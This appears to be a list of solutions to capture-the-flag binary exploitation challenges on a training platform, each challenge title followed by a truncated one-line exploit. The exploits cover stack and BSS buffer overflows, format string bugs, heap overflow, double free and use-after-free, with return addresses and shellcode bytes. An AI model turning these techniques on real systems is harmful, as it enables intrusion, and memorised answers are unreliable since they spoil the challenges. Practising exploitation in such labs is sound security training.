Advanced binary exploitation
ELF x86 - Stack buffer overflow basic 2
$ (python -c 'print "A"*128 +"\x64\x84\x04\x08" ' ;cat) | ./ch15
ELF x64 - Stack buffer overflow - basic
$ (python -c 'print "A"*280+"\xcd\x06\x40\x00\x00\x00\x00\x00"'; cat) | ./ch35
ELF x86 - Format string bug basic 2
import struct CHECK_ADDR = <addr> exploit = "" exploit += struct.pack("I", CHECK_ADDR) #...
ELF x64 - Stack buffer overflow - PIE
shell 1: app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("...
ELF x86 - BSS buffer overflow
./ch7 `python -c 'print "\x90"*483 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x6...
ELF x64 - Basic heap overflow
import pwn USER = "app-systeme-ch94" PASS = "app-systeme-ch94" def main(): s = pwn.ssh(USER, "ch...
ELF x64 - Double free
"1 → 5 → 1 → 3 → 7 → 1 → 4 → 5 → 1 → 5 → 2 → 1 → 7 → 1"
ELF x86 - Use After Free - basic
app-systeme-ch63@challenge03:~$ printf "1\ntoto\n4\n5\nAAAABBBBCCCC\xcb\x87\x04\x08\nhome\n7\n3\...
ELF x86 - Stack buffer overflow basic 6
app-systeme-ch33@challenge02:~$ ./ch33 $(python -c 'print "A"*32 + "\xb0\x70\xe6\xb7" + "\xf0\xab...
ELF x86 - Format String Bug Basic 3
app-systeme-ch17@challenge02:~$ export SHELLCODE=`python -c 'print("\x6a\x0b\x58\x99\x52\x66\x68\...